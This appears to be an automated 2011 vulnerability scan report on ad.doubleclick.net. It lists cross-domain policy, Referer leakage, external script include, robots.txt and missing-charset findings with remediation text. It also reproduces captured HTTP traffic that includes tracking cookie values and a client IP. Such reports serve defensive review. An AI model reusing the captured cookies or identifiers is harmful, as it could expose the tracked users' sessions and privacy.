You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Issue background
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following links to other domains:
http://s1.2mdn.net/568459/4-SF_728x90_Max.jpg
http://s1.2mdn.net/879366/flashwrite_1_2.js
Request
GET /adi/N1823.bnet.com/B5040075.19;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18501&sg=484518&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e5:4DB84258746864&orh=bnet.com&oepartner=&epartner=&ppartner=&pdom=www.bnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=7XNdKwoPOVQAADPyL8UAAAA0&t=2011.04.27.23.37.45&event=58/;ord=2011.04.27.23.37.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/management?tag=hdr-management User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 27 Apr 2011 23:40:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Content-Length: 7825
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed Dec 15 10:37:18 EST 2010 --> <script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... net.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D7XNdKwoPOVQAADPyL8UAAAA0%26t%3D2011.04.27.23.37.45%26event%3D58/http://www.statefarm.com/about/our_agents/become_agent/become_agent.asp"><img src="http://s1.2mdn.net/568459/4-SF_728x90_Max.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
The response contains the following links to other domains:
http://s1.2mdn.net/568459/1-rev_300x250_Home.gif
http://s1.2mdn.net/879366/flashwrite_1_2.js
Request
GET /adi/N1823.bnet.com/B5040075.20;sz=300x250;click0=http://adlog.com.com/adlog/e/r=18497&sg=484519&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e7:4DB847AA6E5E19&orh=bnet.com&oepartner=&epartner=&ppartner=&pdom=www.bnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=7XNdKwoPOVQAADPyL8UAAAA0&t=2011.04.27.23.37.45&event=58/;ord=2011.04.27.23.37.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/management?tag=hdr-management User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 27 Apr 2011 23:40:42 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Content-Length: 7844
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed Dec 15 12:02:40 EST 2010 --> <script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... net.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D7XNdKwoPOVQAADPyL8UAAAA0%26t%3D2011.04.27.23.37.45%26event%3D58/http://www.statefarm.com/about/our_agents/become_agent/become_agent.asp"><img src="http://s1.2mdn.net/568459/1-rev_300x250_Home.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
The response contains the following links to other domains:
http://s1.2mdn.net/568459/1-rev_300x250_Home.gif
http://s1.2mdn.net/879366/flashwrite_1_2.js
Request
GET /adi/N1823.bnet.com/B5040075.21;sz=300x250;click0=http://adlog.com.com/adlog/e/r=18498&sg=484520&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=200&e=&rqid=01c17-ad-e3:4DB85BCE5AD152&orh=bnet.com&oepartner=&epartner=&ppartner=&pdom=www.bnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=7XNdKwoPOVQAADPyL8UAAAA0&t=2011.04.27.23.37.45&event=58/;ord=2011.04.27.23.37.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/management?tag=hdr-management User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 27 Apr 2011 23:40:44 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Content-Length: 7844
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed Dec 15 12:02:40 EST 2010 --> <script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... net.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D7XNdKwoPOVQAADPyL8UAAAA0%26t%3D2011.04.27.23.37.45%26event%3D58/http://www.statefarm.com/about/our_agents/become_agent/become_agent.asp"><img src="http://s1.2mdn.net/568459/1-rev_300x250_Home.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"><img src="http://s0.2mdn.net/2199899/Q211_COMN_AQ_DTV_9.99x6-MLBUpgrade-NX_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"><img src="http://s0.2mdn.net/2199899/Q211_COMN_AQ_DTV_9.99x6-MLBUpgrade-XF_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/ ...[SNIP]... &count=&ra=173.193.214.243&pg=gREAagoOYJUAABq2KccAAAEr&t=2011.04.27.21.55.51&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... xpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"><img src="http://s0.2mdn.net/2658969/adidas_300x250_5star.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/0/0/%2a/j;44306;0-0;0;60254165;4307-300/250;0/0/0;;~okv=;source=;established=;ontour=0;ontourinusercountry=0;lang=en;geo=us;mmuser=0;loggedin=0;sz=300x250,300x600;tile=2;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
7. Cross-domain script includepreviousnext There are 13 instances of this issue:
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The response dynamically includes the following script from another domain:
http://s1.2mdn.net/879366/flashwrite_1_2.js
Request
GET /adi/N1823.bnet.com/B5040075.19;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18501&sg=484518&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e5:4DB84258746864&orh=bnet.com&oepartner=&epartner=&ppartner=&pdom=www.bnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=7XNdKwoPOVQAADPyL8UAAAA0&t=2011.04.27.23.37.45&event=58/;ord=2011.04.27.23.37.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/management?tag=hdr-management User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 27 Apr 2011 23:40:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Content-Length: 7825
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed Dec 15 10:37:18 EST 2010 --> <script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://s1.2mdn.net/879366/flashwrite_1_2.js
Request
GET /adi/N1823.bnet.com/B5040075.20;sz=300x250;click0=http://adlog.com.com/adlog/e/r=18497&sg=484519&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e7:4DB847AA6E5E19&orh=bnet.com&oepartner=&epartner=&ppartner=&pdom=www.bnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=7XNdKwoPOVQAADPyL8UAAAA0&t=2011.04.27.23.37.45&event=58/;ord=2011.04.27.23.37.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/management?tag=hdr-management User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 27 Apr 2011 23:40:42 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Content-Length: 7844
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed Dec 15 12:02:40 EST 2010 --> <script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://s1.2mdn.net/879366/flashwrite_1_2.js
Request
GET /adi/N1823.bnet.com/B5040075.21;sz=300x250;click0=http://adlog.com.com/adlog/e/r=18498&sg=484520&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=200&e=&rqid=01c17-ad-e3:4DB85BCE5AD152&orh=bnet.com&oepartner=&epartner=&ppartner=&pdom=www.bnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=7XNdKwoPOVQAADPyL8UAAAA0&t=2011.04.27.23.37.45&event=58/;ord=2011.04.27.23.37.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/management?tag=hdr-management User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 27 Apr 2011 23:40:44 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Content-Length: 7844
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed Dec 15 12:02:40 EST 2010 --> <script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Tue Apr 26 19:20:42 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Tue Apr 26 19:20:35 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/ ...[SNIP]...
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]...
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]...
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]...
Report generated byXSS.CX at Wed Apr 27 21:06:51 CDT 2011.